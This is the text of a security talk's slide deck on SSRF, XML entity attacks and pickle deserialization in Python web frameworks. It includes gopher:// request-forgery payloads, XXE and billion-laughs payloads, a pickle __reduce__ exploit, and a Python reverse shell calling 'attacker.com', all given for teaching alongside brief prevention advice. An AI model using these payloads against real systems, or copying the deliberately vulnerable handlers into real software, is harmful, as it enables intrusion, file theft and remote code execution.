Mike Haworth: Surprise features you didn't ask for

Surprise Features That you didn’t ask for

Outline Server Side Request Forgery (SSRF) Serialization mischief Signed cookies

Server Side Request Forgery

SSRF Example: API test page - User provides URL for
remote API - Server makes request to API - Displays response to user

SSRF: Bottle app @post('/fetch') def fetch(): url = request.forms.get('url') req
= urllib2.Request(url) response = urllib2.urlopen(req) return response.read()

SSRF: Bottle app

SSRF Attacker with SSRF could: - access services on localhost
- access other hosts in DMZ - bypass host based security restrictions

SSRF Services that rely on host based auth: - memcached
- Docker’s REST API (not enabled by default) - mongod REST API (read only) - CouchDB - lots more...

SSRF and Python Libs urllib3 and requests libs only accept
http(s):// - Only likely to be able forge GET urllib, urllib2 and pycurl support file:// - Can read a local file!

Local file read from urllib2 @post('/fetch') def fetch(): url =
request.forms.get('url') req = urllib2.Request(url) response = urllib2.urlopen(req) return response.read()

SSRF and Python Libs pycurl accepts gopher:// THATS RIGHT, GOPHER!
Can send any data (except 0x00) just URL encode it

Forging a POST to internal host Forging a request to
an internal host with gopher: gopher://192.168.43.235:8888/2%50%4f%53%54%20%2f%61%64%64%75%75%73%65%72%20% 48%54%54%50%2f%31%2e%31%0a%48%6f%73%74%3a%20%69%6e%74%65%72%6e%61 … The receiver sees POST to API from allowed host: POST /internal-api/adduser HTTP/1.1 Host: internal-api.server.local Content-Type: application/x-www-form-urlencoded Content-Length: 49 username=hax0r&password=hax0r

SSRF memcached memcached speaks a plaintext protocol accessible without auth
on port 11211 http://www.slideshare.net/d0znpp/ssrf-workshop

SSRF memcached Example telnet session with memcache $ telnet localhost
11211 set mykey 0 0 6 mydata STORED get mykey VALUE mykey 0 6 mydata END

SSRF and memcache gopher://127.0.0.1:11211/2get%20mykey%0Aquit

SSRF Bug Bounty There’s a file in the web root
that can only be accessed from localhost. The file contains a bitcoin private key http://blog.fin1te.net/

SSRF Bug Bounty http://blog.fin1te.net/

SSRF Bug Bounty curl PHP’s parse_url

Preventing SSRF Blacklist is error prone. Block requests to private
ranges eg. 0.0.0.0 /8 127.0.0.1 /8

Preventing SSRF Whitelisting can fail if site has redirect functionality

Serialization Mischief

XML XML is everywhere RSS, SVG, docx, odf, saml, SOAP,
XMPP, EXIF... Just to name a few

XML Parsing XML from Bottle @post('/lxml') def lxml(): from lxml
import etree tree = etree.parse(request.body) return tree.getroot().text

XML Entities Submit this: <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY
author “John Doe”> ]> <root>&author;</root> Parsed Result: <root>John Doe</root>

XML Billion laughs <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol
"lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> ... ]> <lolz>&lol9;</lolz>

XML External Entity (XXE) Submit this: <?xml version="1.0"?> <!DOCTYPE doc
[ <!ENTITY external SYSTEM “file:///etc/passwd”> ]> <doc>&external;</doc> Parsed Result: <doc>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

XML and SSRF Submit this: <?xml version="1.0"?> <!DOCTYPE doc [
<!ENTITY external SYSTEM “\\attackers-ip”> ]> <doc>&external;</doc> Parsed Result: Owned by SMBrelay

XML and SSRF SMB Relay Get Victim to connect to
us, relay their credentials to target

SAX: Remote DTD retrieval @post('/sax') def sax(): from xml.sax import
make_parser from xml.sax.handler import ContentHandler parser = make_parser() parser.setContentHandler(myHandler()) parser.parse(request.body)

SAX: Remote DTD retrieval POST /sax HTTP/1.1 Host: localhost:8082 Content-Length:
105 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo PUBLIC "-//AURA//PENTEST//EN" "http://172.16.1.44:8888"> <foo>SSRF in SAX via DTD retrieval</foo>

SAX: Remote DTD retrieval Netcat listening on the attackers host
$ nc -l 8888 GET / HTTP/1.0 Host: 172.16.1.44:8888 User-Agent: Python-urllib/1.17

Status of XML parsing in Python libs Source: https://pypi.python.org/pypi/defusedxml

Tastypie XXE

Preventing XML parsing issues Can users control XML content that
the app parses? Use diffusedxml Review 3rd party code for XML parsing

Signed Cookies

Session management 1. Opaque token id=<random string> OR 2. Serialized
data id=<base64(serialize(obj))>.<hmac(k,m)>

Signed cookies Session data is visible to user... which is
fine unless you store a 2FA challenge in it

Signed Cookies Session data is trusted so its fine to
perform actions based on its data… unless the session data contains a discount thats already been applied

Signed Cookies Its signed so its totally ok to just
deserialize data from user… ..unless they can somehow read the secret key ..maybe the app’s vulnerable to XXE?

Serializers: JSON v. Pickle Serializing with JSON risks: - Content
visible to user - Replay attacks, if nonce not used - Content could be altered if secret exposed

Serializers: JSON v. Pickle Serialize with Pickle, all of the
risks for JSON plus: Unpickling user data introduces risk of remote code execution How?

Unpickling user data class Exploit(object): def __reduce__(self): return (os.system, ('touch
/tmp/pwnd',)) # this is run when obj is created pickled = pickle.dumps(Exploit()) # serialize Exploit object to text print pickled pickle.loads(pickled) # create Exploit object from text https://blog.nelhage.com/2011/03/exploiting-pickle/

/tmp/pwnd',)) # this is run when obj is created pickled = pickle.dumps(Exploit()) print pickled pickle.loads(pickled) https://blog.nelhage.com/2011/03/exploiting-pickle/

/tmp/pwnd',)) pickled = pickle.dumps(Exploit()) # serialize Exploit object to text print pickled pickle.loads(pickled) https://blog.nelhage.com/2011/03/exploiting-pickle/

Unpickling user data pickled = pickle.dumps(Exploit()) print pickled # print
out serialized object pickle.loads(pickled) $ python pickleme.py cposix # this is what pickle “stack language” system # looks like p0 (S'touch /tmp/pwnd' p1

/tmp/pwnd',)) pickled = pickle.dumps(Exploit()) print pickled pickle.loads(pickled) # create Exploit object from text # (this is going to run) https://blog.nelhage.com/2011/03/exploiting-pickle/

Unpickling user data $ python pickleme.py <object code> $ ls
-l /tmp/pwnd -rw-rw-r-- 1 mike mike 0 Sep 13 11:46 /tmp/pwnd

Signed cookies Since 1.6 Django started using JSON over pickle
Flask switched to JSON in mid 2013 itsdangerous (good name) defaults to JSON (pickle optional)

Signed Cookies Frameworks still using pickle: - Bottle - Pylons/Pyramid
- Werkzeug - Beaker

Signed Cookies: Bottle

Remote Code Execution 1. Read the secret used to sign
the cookie 2. Write code to give ourselves a shell 3. Use pickle to serialise the code 4. Base64 encode and sign 5. Send cookie to application

Reading the secret, used to sign

Code for remote shell revshell = import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);
s.connect(("attacker.com",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Use Pickle to Serialise revshell 1. Read the secret used
to sign the cookie 2. Write code to give ourselves a shell 3. Use pickle to serialise the code Create object with reduce method that’ll run shellcode http://vudang.com/2013/01/python-web-framework-from-lfr

Create signed cookie, send to app

Attacker’s host gets remote shell

We’re Hiring Pentesting Challenges http://tinyurl.com/h4ckit

Mike Haworth: Surprise features you didn't ask for

Mike Haworth: Surprise features you didn't ask for

More Decks by New Zealand Python User Group

Other Decks in Programming

Featured

Transcript